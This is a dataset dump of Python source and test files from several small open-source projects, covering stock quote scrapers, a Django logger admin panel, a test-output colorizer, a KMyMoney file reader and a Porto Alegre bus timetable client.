metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "jonathadv/b3-stock-info",
"score": 3
} |
#### File: b3-stock-info/b3stockinfo/core.py
```python
from typing import Callable, List
from requests import Response
from requests.exceptions import RequestException
from requests_html import HTMLSession
from .exceptions import StockFactoryError
from .selectors import REIT_SELECTORS, STOCK_SELECTORS
from .serializers import JsonSerializer
class Stock(JsonSerializer):
def __init__(self, **kwargs):
super()
self._ticker = None
self._name = None
self._value = None
self.__dict__.update(kwargs)
def attributes(self, display_dunder: bool = False):
attrs = []
for k in self.__dict__:
if k.startswith("_") and not display_dunder:
continue
attrs.append(k)
return attrs
def __str__(self):
return str(self.to_json())
def __repr__(self):
return (
f"{self.__class__.__name__}("
f"ticker='{self._ticker}', "
f"name='{self._name}', "
f"value={self._value})"
)
class StockFactory:
def __init__(self, base_url: str, timeout: int = 1):
self.base_url = base_url
self.session = HTMLSession()
self.timeout = timeout
def create(self, ticker: str, is_reit: bool = False) -> Stock:
url = self.base_url % ticker
try:
payload: Response = self.session.get(url, timeout=self.timeout)
except RequestException as err:
raise StockFactoryError(
f"An error has occurred while calling url=[{url}].", err
) from None
if "/error" in payload.url:
raise StockFactoryError(f"Unable to find Stock ticker `{ticker}`")
attrs = self.get_attributes(payload, is_reit)
return Stock(**attrs)
def get_attributes(self, payload: Response, is_reit: bool):
selectors = REIT_SELECTORS if is_reit else STOCK_SELECTORS
attrs = {}
for field, args in selectors.items():
value = self.get_value(payload, args["selector"], args["parsers"])
attrs[field] = value
if args.get("canonical"):
attrs[args.get("canonical")] = value
return attrs
@staticmethod
def get_value(payload: Response, selector: str, parsers: List[Callable] = None):
if not parsers:
parsers = []
try:
value = payload.html.find(selector)[0].text
for parser in parsers:
value = parser(value)
return value
except Exception:
return None
``` |
{
"source": "jonathadv/django-logging-panel",
"score": 2
} |
#### File: django_logger_panel/views/base.py
```python
from typing import List, Dict
from django.views.generic import TemplateView
from django_logger_panel import BASE_URL
from django_logger_panel.__version__ import __version__
BASE_URL_KEY = "base_url"
PROJECT_VERSION_KEY = "project_version"
BREADCRUMBS_KEY = "breadcrumbs"
class LoggerBaseView(TemplateView):
"""The base class for Views in Logger Panel"""
def get_breadcrumbs(self) -> List[Dict[str, str]]:
"""Creates a list of dicts to work as breadcrumbs"""
breadcrumbs = []
crumbs = [v for v in self.request.path.split("/") if v]
while crumbs:
breadcrumbs.insert(
0,
{"url": f"/{'/'.join(crumbs)}", "name": crumbs.pop(), "is_last": False},
)
breadcrumbs[-1]["is_last"] = True
return breadcrumbs
def get_context_data(self, **kwargs):
"""
Adds `base_url`, `project_version` and `breadcrumbs` to the common context.
"""
base_context = {
BASE_URL_KEY: BASE_URL,
PROJECT_VERSION_KEY: __version__,
BREADCRUMBS_KEY: self.get_breadcrumbs(),
}
context: dict = super().get_context_data(**kwargs)
context.update(base_context)
return context
def render_to_response(self, context, **response_kwargs):
"""Check the accept header and calls the proper render function"""
if self.request.META.get("HTTP_ACCEPT") == "application/json":
return self.render_to_json_response(context)
return super().render_to_response(context, **response_kwargs)
def render_to_json_response(self, context: dict):
"""Each class should implement its own way
to render the JSON response.
"""
raise NotImplementedError()
```
#### File: django_logger_panel/views/logger.py
```python
import json
import logging
from django.http import JsonResponse, HttpResponseRedirect
from django.utils.decorators import method_decorator
from django.views.decorators.csrf import csrf_exempt
from django_logger_panel import BASE_URL
from django_logger_panel.core import LEVELS, set_logger_level, get_all_loggers
from django_logger_panel.serializers import (
logger_response_serializer,
logger_serializer,
)
from django_logger_panel.views.base import LoggerBaseView
LOGGER = logging.getLogger(__name__)
LOGGERS_KEY = "loggers"
LOGGER_NAME_KEY = "logger_name"
LOGGER_LEVEL_KEY = "logger_level"
LOGGER_LEVELS_KEY = "logger_levels"
LOGGER_INSTANCE_KEY = "logger"
ERROR_KEY = "error"
class LoggerListView(LoggerBaseView):
"""
View to List the loggers
"""
template_name = "loggerpanel/loggers.html"
success_url = BASE_URL
def post(self, request, *_args, **kwargs):
"""Calls the `set_logger_level()` function with the arguments received in the `form`"""
logger_name = request.POST.get(LOGGER_NAME_KEY)
logger_level = request.POST.get(LOGGER_LEVEL_KEY)
try:
set_logger_level(logger_name, logger_level)
return HttpResponseRedirect(self.success_url)
# pylint: disable=broad-except
except Exception as err:
LOGGER.error(err)
context = self.get_context_data(**kwargs)
context[ERROR_KEY] = str(err)
return self.render_to_response(context)
def get_context_data(self, **kwargs):
"""Adds `loggers` and `logger_levels` to the context"""
context: dict = super().get_context_data(**kwargs)
context[LOGGERS_KEY] = get_all_loggers()
context[LOGGER_LEVELS_KEY] = LEVELS
return context
def render_to_json_response(self, context: dict):
"""Renders `logger_levels` and `loggers` as JSON"""
data = logger_response_serializer(
context[LOGGER_LEVELS_KEY], context[LOGGERS_KEY]
)
return JsonResponse(data)
@method_decorator(csrf_exempt, name="dispatch")
class LoggerDetailView(LoggerBaseView):
"""View to display the details of a specific logger instance"""
template_name = "loggerpanel/detail.html"
# pylint: disable=no-self-use
# pylint: disable=broad-except
def post(self, request, *_args, **kwargs):
"""Handles the details for a logger instance"""
try:
logger_name = kwargs.get(LOGGER_NAME_KEY)
logger_level = json.loads(request.body)[LOGGER_LEVEL_KEY]
set_logger_level(logger_name, logger_level)
data = logger_serializer(get_all_loggers()[logger_name])
return JsonResponse(data)
except KeyError as err:
LOGGER.error(err)
return JsonResponse({ERROR_KEY: f"missing argument {err}"}, status=400)
except Exception as err:
LOGGER.error(err)
return JsonResponse({ERROR_KEY: str(err)}, status=400)
def get_context_data(self, **kwargs):
"""Adds `logger_name` and a `Logger` instance to the context"""
logger_name = kwargs.get(LOGGER_NAME_KEY)
context: dict = super().get_context_data(**kwargs)
loggers = get_all_loggers()
context[LOGGER_NAME_KEY] = logger_name
context[LOGGER_INSTANCE_KEY] = loggers.get(logger_name)
return context
def render_to_json_response(self, context: dict):
"""Renders a `Logger` instance as JSON"""
data = logger_serializer(context[LOGGER_INSTANCE_KEY])
return JsonResponse(data)
```
#### File: django-logging-panel/tests/test_url.py
```python
import json
from django.test import TestCase, Client
from django.urls import reverse
from http import HTTPStatus
class RestTestCase(TestCase):
"""Test suite for REST endpoints."""
def setUp(self):
"""Define the test variables."""
self.client = Client()
def test_list_all_loggers(self):
"""Test listing all loggers."""
url = reverse("loggerpanel-list")
resp = self.client.get(url, HTTP_ACCEPT="application/json")
content = json.loads(resp.content)
self.assertEqual(resp.status_code, HTTPStatus.OK)
self.assertIsInstance(content["log_levels"], dict)
self.assertIsInstance(content["loggers"], list)
def test_change_log_level(self):
"""Test change a logger level."""
previous_level = "WARNING"
new_level = "DEBUG"
url = reverse("loggerpanel-detail", kwargs={"logger_name": "root"})
resp = self.client.get(url, HTTP_ACCEPT="application/json")
content = json.loads(resp.content)
self.assertEqual(resp.status_code, HTTPStatus.OK)
self.assertEqual(content["effectiveLevel"]["name"], previous_level)
resp = self.client.post(
url, {"logger_level": new_level}, content_type="application/json"
)
self.assertEqual(resp.status_code, HTTPStatus.OK)
resp = self.client.get(url, HTTP_ACCEPT="application/json")
content = json.loads(resp.content)
self.assertEqual(resp.status_code, HTTPStatus.OK)
self.assertEqual(content["effectiveLevel"]["name"], new_level)
``` |
{
"source": "jonathadv/django-test-prettify",
"score": 3
} |
#### File: jonathadv/django-test-prettify/tests.py
```python
import sys
import unittest
from contextlib import contextmanager
from io import StringIO
from unittest_prettify.colorize import (
BLUE,
GREEN,
MAGENTA,
RED,
RESET,
WHITE,
YELLOW,
colorize,
)
@contextmanager
def captured_output():
new_out, new_err = StringIO(), StringIO()
old_out, old_err = sys.stdout, sys.stderr
try:
sys.stdout, sys.stderr = new_out, new_err
yield sys.stdout, sys.stderr
finally:
sys.stdout, sys.stderr = old_out, old_err
def _extract_test_comment(stderr):
value = stderr.getvalue().strip()
value = value.split("\n")[1]
value = value.replace("... ok", "").strip()
return value
class Test:
@colorize(color=GREEN)
class ColorizedClass(unittest.TestCase):
@colorize(color=WHITE)
def test_white(self):
"""This test comment should be WHITE"""
@colorize(color=RED)
def test_red(self):
"""This test comment should be RED"""
@colorize(color=BLUE)
def test_blue(self):
"""This test comment should be BLUE"""
@colorize(color=MAGENTA)
def test_magenta(self):
"""This test comment should be MAGENTA"""
@colorize(color=YELLOW)
def test_yellow(self):
"""This test comment should be YELLOW"""
def test_green1(self):
"""This test comment should be with the default color set as GREEN"""
class NotColorizedClass(unittest.TestCase):
def test_no_color(self):
"""This test comment should not have color"""
@colorize(color=BLUE)
def test_blue(self):
"""This test comment should be BLUE"""
@colorize(color=RED)
def test_red(self):
"""This test comment should be RED"""
@colorize(color=GREEN)
class NoCommentClass(unittest.TestCase):
def test_with_no_comment(self):
pass
class ColorizedClassTestCase(unittest.TestCase):
tests = (
{
"name": "test_white",
"comment": "This test comment should be WHITE",
"color": WHITE,
},
{
"name": "test_red",
"comment": "This test comment should be RED",
"color": RED,
},
{
"name": "test_blue",
"comment": "This test comment should be BLUE",
"color": BLUE,
},
{
"name": "test_magenta",
"comment": "This test comment should be MAGENTA",
"color": MAGENTA,
},
{
"name": "test_yellow",
"comment": "This test comment should be YELLOW",
"color": YELLOW,
},
{
"name": "test_green1",
"comment": "This test comment should be with the default color set as GREEN",
"color": GREEN,
},
)
def test_colorized_class(self):
"""Should match all test description colors against the @colorize decorator in method or in the class"""
for test in self.tests:
with captured_output() as (_, err):
suite = unittest.TestSuite([Test.ColorizedClass(test["name"])])
unittest.TextTestRunner(verbosity=2).run(suite)
current_value = _extract_test_comment(err)
expected_value = f"{test['color']}{test['comment']}{RESET}"
self.assertEqual(current_value, expected_value)
class ColorizedMethodsOnlyTestCase(unittest.TestCase):
tests = (
{
"name": "test_blue",
"comment": "This test comment should be BLUE",
"color": BLUE,
},
{
"name": "test_red",
"comment": "This test comment should be RED",
"color": RED,
},
)
def test_colorized_methods(self):
"""Should match all test description colors against the @colorize decorator in the mothod"""
for test in self.tests:
with captured_output() as (_, err):
suite = unittest.TestSuite([Test.NotColorizedClass(test["name"])])
unittest.TextTestRunner(verbosity=2).run(suite)
current_value = _extract_test_comment(err)
expected_value = f"{test['color']}{test['comment']}{RESET}"
self.assertEqual(current_value, expected_value)
def test_not_colorized_method(self):
"""Method without @colorize should not have color"""
with captured_output() as (_, err):
suite = unittest.TestSuite([Test.NotColorizedClass("test_no_color")])
unittest.TextTestRunner(verbosity=2).run(suite)
current_value = _extract_test_comment(err)
expected_value = "This test comment should not have color"
self.assertEqual(current_value, expected_value)
class NoCommentTestCase(unittest.TestCase):
def test_not_commented_method(self):
"""Should not throw error even if there is not comment in the method"""
with captured_output() as (_, err):
suite = unittest.TestSuite([Test.NoCommentClass("test_with_no_comment")])
unittest.TextTestRunner(verbosity=2).run(suite)
current_value = _extract_test_comment(err)
self.assertEqual(current_value, "")
if __name__ == "__main__":
unittest.main(verbosity=2)
``` |
{
"source": "jonathadv/ir-calculator",
"score": 3
} |
#### File: ir-calculator/ircalculator/reports.py
```python
from ircalculator.stocks import Stock, Transaction
from typing import List
def display(report):
print("-" * 60)
print("\n".join(report))
print("-" * 60)
def build_sold_only(stocks: List[Stock]) -> List[str]:
report = []
for stock in stocks:
result = stock.total_amount_with_cost(Transaction.SELL)
if result:
report.append(f"{stock.ticker}: {result}")
return report
def build_overall_results(stocks: List[Stock]) -> List[str]:
report = []
for stock in stocks:
result = stock.overall_result()
report.append(f"{stock.ticker}: {result}")
return report
def build_transactions(stock: Stock):
report = []
report.append("----------------------- Transaction -----------------------")
for p in stock.get_transactions():
report.append(str(p))
report.append(f"\t{p.trans_type}: {p.total()}")
for c in p.costs:
report.append(f"\t\t{c}")
report.append("-" * 60)
return "\n".join(report)
def build_details(stocks: List[Stock]) -> List[str]:
report = []
for stock in stocks:
transactions = build_transactions(stock)
sell = stock.total_amount_with_cost(Transaction.SELL)
buy = stock.total_amount_with_cost(Transaction.BUY)
total_amount = buy if not sell else sell - buy
content = f"""
# {stock.ticker}
Total Sold: {stock.n_sold()}
Total Purchased: {stock.n_purchased()}
Total Amount (RS): {stock.total_amount()}
Total Cost (RS): {stock.total_cost()}
Amount + Cost (RS): {total_amount}
{transactions}
"""
report.append(content)
return report
def build_for_spreadsheet(stocks: List[Stock]) -> List[str]:
pass
``` |
{
"source": "jonathadv/kmymoney-stock-server",
"score": 3
} |
#### File: jonathadv/kmymoney-stock-server/stock-server.py
```python
import time
import sys
import requests
from datetime import datetime
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
br_stock_url = 'https://query2.finance.yahoo.com/v10/finance/quoteSummary/{code}.SA?formatted=true&crumb=5zlPOxz.vH.&lang=pt-BR®ion=BR&modules=price'
usa_stock_url = 'https://query1.finance.yahoo.com/v8/finance/chart/{code}?region=US&lang=en-US&includePrePost=false&interval=2m&range=1d&corsDomain=finance.yahoo.com&.tsrc=finance'
currency_url = 'https://query1.finance.yahoo.com/v8/finance/chart/{code}=X'
ignore_urls = ['/favicon.ico']
def handle_br_stock(json, status_code):
return (json.get('quoteSummary').get('result')[0].get('price').get('regularMarketPrice').get('raw'), status_code)
def handle_currency(json, status_code):
return (json.get('chart').get('result')[0].get('meta').get('regularMarketPrice'), status_code)
def handle_usa_stock(json, status_code):
return (json.get('chart').get('result')[0].get('meta').get('regularMarketPrice'), status_code)
class SimpleHandler(BaseHTTPRequestHandler):
def do_GET(self):
if '/stock/br' in self.path:
url = br_stock_url
process_fn = handle_br_stock
elif '/stock/usa' in self.path:
url = usa_stock_url
process_fn = handle_usa_stock
elif '/currency' in self.path:
url = currency_url
process_fn = handle_currency
elif self.path in ignore_urls:
return
else:
print "'%s' not found!" % str(self.path)
return
code = self.path.split('/')[-1]
price, status_code = self.get_info(url, code, process_fn)
response = "{}|{}".format(price, datetime.now().strftime('%Y-%m-%d'))
self.send(response, status_code)
def send(self, response, status_code):
self.send_response(status_code)
self.send_header('Content-length',str(len(response)))
self.send_header('Content-Type','text/plain')
self.end_headers()
self.wfile.write(response)
def get_info(self, url, code, process_fn):
url = url.replace('{code}', code)
print "Getting Stock info... url=%s" % url
sys.stdout.flush()
resp = requests.get(url)
print "Request done!"
sys.stdout.flush()
if(resp.status_code == 200):
return process_fn(resp.json(), 200)
else:
return ("", 404)
def main():
host = '0.0.0.0'
port = 1203
httpd = HTTPServer((host, port), SimpleHandler)
print time.asctime(), 'Server Starts - %s:%s' % (host, port)
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
print time.asctime(), 'Server Stops - %s:%s' % (host, port)
if __name__ == '__main__':
main()
``` |
{
"source": "jonathadv/kmy",
"score": 3
} |
#### File: kmy/tests/test_payeeaddress.py
```python
import unittest
from kmy.kmy import Kmy
file_name = 'Test.kmy'
class TestPayeeAddress(unittest.TestCase):
def setUp(self):
mm = Kmy.from_kmy_file(file_name)
self.address = mm.payees[0].address
def test_read_telephone(self):
self.assertEqual('+1 312 123 4567', self.address.telephone)
def test_read_state(self):
self.assertEqual('WH', self.address.state)
def test_read_city(self):
self.assertEqual('Whoville', self.address.city)
def test_read_street(self):
self.assertEqual("123 Street\n42 Something", self.address.street)
def test_read_postcode(self):
self.assertEqual('WHO 123', self.address.postCode)
if __name__ == '__main__':
unittest.main()
```
#### File: kmy/tests/test_split.py
```python
import unittest
from kmy.kmy import Kmy
file_name = 'Test.kmy'
class TestSplit(unittest.TestCase):
def setUp(self):
mm = Kmy.from_kmy_file(file_name)
self.splits = mm.transactions[0].splits
self.split0 = self.splits[0]
def test_read_splits_count(self):
self.assertEqual(2, len(self.splits))
def test_read_payee(self):
self.assertEqual('', self.split0.payee)
def test_read_memo(self):
self.assertEqual('', self.split0.memo)
def test_read_shares(self):
self.assertEqual('42/1', self.split0.shares)
def test_read_number(self):
self.assertEqual('', self.split0.number)
def test_read_action(self):
self.assertEqual('', self.split0.action)
def test_read_price(self):
self.assertEqual('1/1', self.split0.price)
def test_read_account(self):
self.assertEqual('A000001', self.split0.account)
def test_read_reconcileflag(self):
self.assertEqual('0', self.split0.reconcileFlag)
def test_read_bankid(self):
self.assertEqual('', self.split0.bankId)
def test_read_value(self):
self.assertEqual('42/1', self.split0.value)
def test_read_reconciledate(self):
self.assertEqual('', self.split0.reconcileDate)
def test_read_id(self):
self.assertEqual('S0001', self.split0.id)
if __name__ == '__main__':
unittest.main()
```
#### File: kmy/tests/test_user_address.py
```python
import unittest
from kmy.kmy import Kmy
file_name = 'Test.kmy'
class TestUserAddress(unittest.TestCase):
def setUp(self):
mm = Kmy.from_kmy_file(file_name)
self.useraddress = mm.user.address
def test_read_telephone(self):
self.assertEqual('Telephone', self.useraddress.telephone)
def test_read_county(self):
self.assertEqual('CountyState', self.useraddress.county)
def test_read_city(self):
self.assertEqual('Town', self.useraddress.city)
def test_read_zipcode(self):
self.assertEqual('PostalCode', self.useraddress.zipcode)
def test_read_street(self):
self.assertEqual('Street', self.useraddress.street)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "jonathadv/metroclima-cli",
"score": 3
} |
#### File: metroclima-cli/metroclima/cli.py
```python
import sys
from click import Choice, group, option, version_option
from . import metroclima
from .__version__ import __title__, __version__
from .options import QUARTERS, YEARS, FileTypes, PostKeys, Sensors, Stations
FILE_TYPES = [t.value for t in FileTypes]
SENSORS = [s.name for s in Sensors]
STATIONS = [l.name for l in Stations]
YEAR_OPTIONS = [str(y) for y in YEARS]
QUARTER_OPTIONS = [str(q) for q in QUARTERS]
def _stderr(message, end='\n', flush=False):
if flush:
sys.stderr.flush()
print(message, file=sys.stderr, end=end)
def _stdout(message, end='\n'):
print(message, end=end)
@group(context_settings={'help_option_names': ['-h', '--help']})
@version_option(version=__version__, prog_name=__title__)
def cli():
"""A simple tool to retrieve information from the Porto Alegre city's Metroclima database."""
pass
@cli.command('get')
@option('-f', '--filetype',
type=Choice(FILE_TYPES),
default='csv',
help='The dump file type')
@option('-y', '--year',
type=Choice([str(i) for i in YEARS]),
default=YEAR_OPTIONS[-1],
help='Choose which year')
@option('-q', '--quarter',
type=Choice([str(q) for q in QUARTERS]),
default=str(QUARTER_OPTIONS[0]),
help='Choose which quarter')
@option('-s', '--sensor',
type=Choice(SENSORS),
default=SENSORS[0],
help='Choose the type of sensor')
@option('-l', '--station',
type=Choice(STATIONS),
default=STATIONS[0],
help='Choose which station')
@option('-d', '--download',
is_flag=True,
default=False,
help="Downloads ")
def get_single_dump(filetype, year, quarter, sensor, station, download):
"""Retrieve dump from Metroclima site"""
"""
:type download: bool
:type station: str
:type sensor: str
:type quarter: str
:type year: str
:type filetype: str
:param filetype: the file extension.
:param year: the year of reference for the data do be retrieved.
:param quarter: the year's quarter of reference for the data do be retrieved.
:param sensor: the sensor from which the information shoule be retrieved.
:param station: from which location the information belongs to.
:param download: determine if the tool should download the file or retreive the URL only.
"""
options = {
PostKeys.FILE_TYPE.value: filetype,
PostKeys.YEAR.value: int(year),
PostKeys.QUARTER.value: int(quarter),
PostKeys.STATION.value: Stations[station].value,
PostKeys.SENSOR.value: Sensors[sensor].value,
PostKeys.SEARCH_STATIONS.value: '',
}
try:
_stderr('Retrieving download URL...')
url = metroclima.retrieve_download_url(options)
_stdout(url)
if download:
_stderr('Downloading file...')
file_name = metroclima.download_file(url)
_stderr('File download at:')
_stdout(file_name)
except metroclima.MetroclimaError as err:
_stderr(err)
def run():
""" Call cli setting the program title """
cli(prog_name=__title__)
``` |
{
"source": "jonathadv/poetry-playground",
"score": 2
} |
#### File: poetry-playground/tests/test_core.py
```python
from module.core import say_hi
def test_say_hi():
assert "Hi" == say_hi()
``` |
{
"source": "jonathadv/PyPoABus",
"score": 2
} |
#### File: PyPoABus/pypoabus/pypoabus.py
```python
import json
import re
import sys
import pkg_resources
import requests
from bs4 import BeautifulSoup
from .entities import BusLine, BusLineItem, Schedule
from .exceptions import NoContentAvailableError, RemoteServerError
# Flag to enable CMD to display the URL built.
DEBUG_URLS = False
def _load_config():
""" Function to open configuration file """
config_file = 'config.json'
conf_file = open(pkg_resources.resource_filename(__package__, config_file))
config = json.load(conf_file)
return config
def _build_url(action, parameter):
""" Function to build URL using information
from config.json file """
config = _load_config()
base_url = config.get('eptc_base_url')
url_action = config.get(action).get('action')
if action == 'list':
parameter = config.get(action).get('zones').get(parameter).get('code')
url_parameters = config.get(action).get('parameters').format(parameter)
url = '{}/{}?{}'.format(base_url, url_action, url_parameters)
if DEBUG_URLS:
print('DEBUG - URL: {}'.format(url), file=sys.stderr)
return url
def _parse_timetable_page(html_doc):
"""
Function to parse the HTML page.
It assumes that the HTML follows the below order:
- Bus line's name and code
- Direction (origin/destination)
- Schedule Type (business days, saturday, sunday)
Example:
281 - <NAME> # Code and Name
NORTE/SUL # Origin/Destionation
Dias Uteis # Business days
05:40 # Time
05:51 # Time
Sabados # Saturday
05:40 # Time
06:00 # Time
Domingos # Sundays
06:00 # Time
06:24 # Time
"""
div_pattern_to_find = 'align="center"><b>'
time_re = r'(\d\d:\d\d)'
direction_re = '([A-Z]+/[A-Z]+)'
day_re = '(Dias Úteis)|(Sábados)|(Domingos)'
div_list = []
soup = BeautifulSoup(html_doc, 'html.parser')
for div in soup.find_all('div'):
if div_pattern_to_find in str(div):
div_list.append(div.text)
if not div_list:
raise NoContentAvailableError('Unable to retrieve information from EPTC web site. '
'Please check the bus line code and try again.')
line_title = div_list[0].split('-')
line_code = line_title[0].strip()
line_name = line_title[1].strip()
bus_line = BusLine(line_name, line_code)
schedule = None
direction = None
for i in range(1, len(div_list)):
if re.match(direction_re, div_list[i].strip()) is not None:
direction = div_list[i].strip()
continue
if re.match(day_re, div_list[i].strip()) is not None:
schedule = Schedule(div_list[i].strip(), direction, [])
bus_line.add_schedule(schedule)
continue
if re.match(time_re, div_list[i].strip()) is not None:
schedule.add_departure_time(div_list[i].strip())
return bus_line
def _add_missing_tags(html_doc):
"""Fixes a issue in the orginal HTML, where the tag <Option> is not closed..
Changes from:
<Select Name=Linha class='ordenacaoSelect'>
<Option Value='510-87'>510 - AUXILIADORA
<Option Value='620-5'>520 - TRIANGULO/24 DE OUTUBRO
To:
<Select Name=Linha class='ordenacaoSelect'>
<Option Value='510-87'>510 - AUXILIADORA</Option>
<Option Value='620-5'>520 - TRIANGULO/24 DE OUTUBRO</Option>
"""
opened_option_tag = r'<Option'
closed_option_re = r'</Option>'
if re.search(closed_option_re, html_doc, re.I) is None:
html_doc = html_doc.replace(opened_option_tag, closed_option_re + opened_option_tag)
return html_doc
def _parse_bus_list_page(html_doc):
"""
Function to parse the bus lines names
"""
bus_line_list = []
html_doc = _add_missing_tags(html_doc)
soup = BeautifulSoup(html_doc, 'html.parser')
for line in soup.find_all('option'):
line_name = re.sub('[ ]+', ' ', line.text).strip()
line_code = line.get('value')
bus_line = BusLineItem(line_code, line_name)
bus_line_list.append(bus_line)
return bus_line_list
def _get_html(url):
"""
Function to retrieve the HTML Page
"""
try:
response = requests.get(url)
except requests.exceptions.ConnectionError as error:
raise RemoteServerError('Unable to establish connection.', error)
if response.status_code != 200:
raise RemoteServerError('Unable to get EPTC page content. '
'HTTP code: {}, reason: {}'
.format(response.status_code, response.reason))
return response.text
def get_bus_timetable(line_code):
"""
Get timetable from the given bus line
"""
url = _build_url('schedule', line_code)
html = _get_html(url)
return _parse_timetable_page(html)
def list_bus_lines(zone):
"""
Get all bus lines from a zone
"""
url = _build_url('list', zone)
html = _get_html(url)
return _parse_bus_list_page(html)
```
#### File: PyPoABus/tests/test_cli.py
```python
import pytest
import pytest_mock
import requests
from pypoabus import __main__, __title__, __version__
from pypoabus.pypoabus import BusLine
def test_get_version(mock, capsys):
""" Check if -v returns the correct application version """
mock.patch('sys.argv', ['', '-v'])
expected = '{} {}\n'.format(__title__, __version__)
try:
__main__.main()
except SystemExit:
pass
capture_result = capsys.readouterr()
assert capture_result.out == expected
def test_get_line_list_from_valid_zone(mock, capsys):
""" Checks if cli returns the correct bus list in unformatted json
for correct zone
"""
expected = '{ "list": ["l1", "l2"] }\n'
mock.patch('sys.argv', ['', '-l', 'south'])
mock.patch('pypoabus.pypoabus.list_bus_lines', return_value='["l1", "l2"]')
try:
__main__.main()
except SystemExit:
pass
capture_result = capsys.readouterr()
assert capture_result.out == expected
def test_get_line_list_from_invalid_zone(mock, capsys):
""" Checks if cli returns the correct error message
for incorrect zone argument
"""
zone = 'NOT_VALID_ZONE'
mock.patch('sys.argv', ['', '-l', zone])
expected = "usage: {} [-h] [-v] [-l zone | -t line_code] [-f format]" \
" [-d]\npypoabus: error: argument -l/--list: " \
"invalid choice: '{}' (choose from 'north', " \
"'south', 'east', 'public')\n".format(__title__, zone)
try:
__main__.main()
except SystemExit:
pass
capture_result = capsys.readouterr()
assert capture_result.err == expected
def test_get_timetable_from_valid_line(mock, capsys):
""" Checks if cli returns the correct bus timetable in unformatted json
for the correct busline
"""
expected = '{"code": "bar", "name": "foo", "schedules": []}\n'
mock.patch('sys.argv', ['', '-t', 'non_existing_line'])
mock.patch('pypoabus.pypoabus.get_bus_timetable', return_value=BusLine('foo', 'bar'))
try:
__main__.main()
except SystemExit:
pass
capture_result = capsys.readouterr()
assert capture_result.out == expected
def test_get_timetable_from_invalid_line(mock, capsys):
""" Checks if cli returns the correct error message
for the incorrect busline argument
"""
expected = 'pypoabus: Error to connect to the server: ' \
'Unable to get EPTC page content. HTTP code: 500, reason: ' \
'Internal Server Error\n\n'
mocked_response = requests.Response()
mocked_response.status_code = 500
mocked_response.reason = 'Internal Server Error'
mock.patch('sys.argv', ['', '-t', 'non_existing_line'])
mock.patch('requests.get', return_value=mocked_response)
try:
__main__.main()
except SystemExit:
pass
capture_result = capsys.readouterr()
assert capture_result.err == expected
```
#### File: PyPoABus/tests/test_integration.py
```python
import pytest
import pytest_mock
from pypoabus import pypoabus
from pypoabus.exceptions import NoContentAvailableError, RemoteServerError
class TestIntegration:
""" Integration testing """
@staticmethod
def test_get_real_south_zone_bus_list():
""" Get the south zone bus list from EPTC website """
zone = 'south'
bus_list = pypoabus.list_bus_lines(zone)
assert isinstance(bus_list, list)
assert bus_list
@staticmethod
def test_get_real_north_zone_bus_list():
""" Get the north zone bus list from EPTC website """
zone = 'north'
bus_list = pypoabus.list_bus_lines(zone)
assert isinstance(bus_list, list)
assert bus_list
@staticmethod
def test_get_real_east_zone_bus_list():
""" Get the east zone bus list from EPTC website """
zone = 'east'
bus_list = pypoabus.list_bus_lines(zone)
assert isinstance(bus_list, list)
assert bus_list
@staticmethod
def test_get_real_public_zone_bus_list():
""" Get the public bus list from EPTC website """
zone = 'public'
bus_list = pypoabus.list_bus_lines(zone)
assert isinstance(bus_list, list)
assert bus_list
@staticmethod
def test_get_real_south_zone_bus_timetable():
""" Get a south zone bus timetble from EPTC website """
bus_line_code = '281-1'
bus_line_name = 'CAMPO NOVO / MORRO AGUDO'
timetable = pypoabus.get_bus_timetable(bus_line_code)
assert timetable.code == bus_line_code.replace('-', '')
assert timetable.name == bus_line_name
@staticmethod
def test_error_when_sending_invalid_bus_line_code():
""" Check if correct error is raised when trying to fetch invalid bus line code """
bus_line_code = 'foo'
with pytest.raises(RemoteServerError, match=r'.*Unable to '
r'get EPTC page content.*'):
pypoabus.get_bus_timetable(bus_line_code)
@staticmethod
def test_error_when_html_does_not_contain_information(mocker):
""" Check if correct error is raised when the response HTML does not contain information """
mocker.patch('pypoabus.pypoabus._get_html', return_value='<html></html>')
bus_line_code = 'foo'
with pytest.raises(NoContentAvailableError, match=r'.*Unable to retrieve '
r'information from EPTC web site.*'):
pypoabus.get_bus_timetable(bus_line_code)
``` |
{
"source": "jonathadv/python-design-patterns-samples",
"score": 4
} |
#### File: python-design-patterns-samples/patterns/singleton.py
```python
def singleton(cls):
"""
This decorator ensures that only one instance of
the decorated class will be created in runtime.
:param cls: a class to be decorated as singleton
:type cls: class
Example:
A decorated class that displays its own `id(self)`
will always return the same value.
>>> @singleton
>>> class SingletonExample:
>>> def __init__(self):
>>> self.own_id: int = id(self)
>>> def __repr__(self):
>>> return f"{self.__class__.__name__}(id={self.own_id})"
>>>
>>> SingletonExample()
SingletonExample(id=140472046362688)
>>> SingletonExample()
SingletonExample(id=140472046362688)
>>> SingletonExample() is SingletonExample()
True
"""
instances = {}
def wrapper(*args, **kwargs):
if cls not in instances:
instances[cls] = cls(*args, **kwargs)
return instances[cls]
return wrapper
@singleton
class SingletonExample:
"""
SingletonExample
A class that stores a value of its id.
"""
def __init__(self):
self.own_id: int = id(self)
def __repr__(self):
return f"{self.__class__.__name__}(id={self.own_id})"
``` |
{
"source": "jonathadv/python-project-sample",
"score": 4
} |
#### File: python-project-sample/my_module/__init__.py
```python
from typing import Union
def my_sum(x: Union[int, float], y: Union[int, float]):
"""This function adds two numbers"""
return x + y
def my_division(x: Union[int, float], y: Union[int, float]):
"""This function divides one number by another"""
return x / y
``` |
{
"source": "Jonathan1214/DC_go",
"score": 3
} |
#### File: mysite__/index/models.py
```python
from django.db import models
# Create your models here.
class Class(models.Model):
id = models.AutoField(primary_key=True)
cname = models.CharField(max_length=32)
class Teacher(models.Model):
id = models.AutoField(primary_key=True)
tname = models.CharField(max_length=32)
cid = models.ManyToManyField(Class, name="teacher")
# name 是做正向查询时用的
# related_name 是做反向查询用的
# 如:
# 假设两个表已经连接好 Class有c1 Teacher有t1
# 正向查询:未指定name 则使用t1.cid即可查询 否则使用t1.name查询
# 反向查询:未指定reated_name 则c1.teacher_set可查询 否则使用c1.related_name查询
# 注意一个十分具有欺骗性的坑,当仅仅创建两个表时,他们并没有连接在一起,而这个时候进行c1.teacher_set仍可以得到返回对象
# (这是为什么呢?)
# 但是使用c1.teacher_set.all时,查询结果为空,在使用c1.teacher_set.add(t1)之后,进行c1.teacher_set.all查询才
# 得到正确的返回
class Person(models.Model):
name = models.CharField(max_length=50)
